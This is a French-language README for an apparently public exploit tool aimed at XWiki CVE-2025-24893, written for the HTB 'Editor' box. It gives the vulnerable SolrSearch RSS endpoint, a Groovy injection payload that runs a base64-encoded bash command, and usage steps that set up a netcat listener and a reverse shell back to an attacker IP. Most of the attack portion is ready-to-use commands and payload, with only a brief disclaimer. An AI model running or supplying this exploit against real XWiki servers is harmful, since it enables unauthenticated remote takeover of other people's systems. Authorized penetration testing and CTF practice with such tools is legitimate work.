
Exploit RCE non authentifié pour XWiki CVE-2025-24893 via injection de script Groovy
Exploit d'exécution de code à distance non authentifié pour les versions de XWiki vulnérables à CVE-2025-24893.
Les versions de XWiki antérieures à 15.10.9 sont vulnérables à une RCE non authentifiée via l'injection de script Groovy dans le gestionnaire de flux RSS SolrSearch. La vulnérabilité existe car XWiki ne parvient pas à assainir correctement les entrées utilisateur dans le paramètre text, permettant aux attaquants de sortir du contexte RSS et d'injecter du code Groovy arbitraire.
Identifiant CVE : CVE-2025-24893
Score CVSS : 9.8 (Critique)
Versions affectées : XWiki < 15.10.9
requests)pip3 install requests
python3 exploit.py <target_url> <attacker_ip> <listener_port>
Exemple :
# Start listener on attacker machine
nc -lvnp 9001
# Run exploit
python3 exploit.py http://10.10.11.80:8080 10.10.14.5 9001
}}}}}}{{{{groovy}}}})/xwiki/bin/get/Main/SolrSearch?media=rss&text=<payload>L'exploit cible le point de terminaison suivant :
/xwiki/bin/get/Main/SolrSearch?media=rss&text=
La vulnérabilité permet de sortir du contexte du flux RSS :
}}}}}}{{{{async async=false}}}}{{{{groovy}}}}
"bash -c {echo,<base64_payload>}|{base64,-d}|{bash,-i}".execute()
{{{{/groovy}}}}{{{{/async}}}}
Cet outil est destiné uniquement à des fins éducatives et de tests de pénétration autorisés. L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par ce programme. Utilisez cet exploit uniquement contre des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test.
Licence MIT - Voir le fichier LICENSE pour plus de détails
Créé pour la box HTB "Editor"
Remarque : Assurez-vous toujours d'avoir une autorisation appropriée avant de tester des systèmes.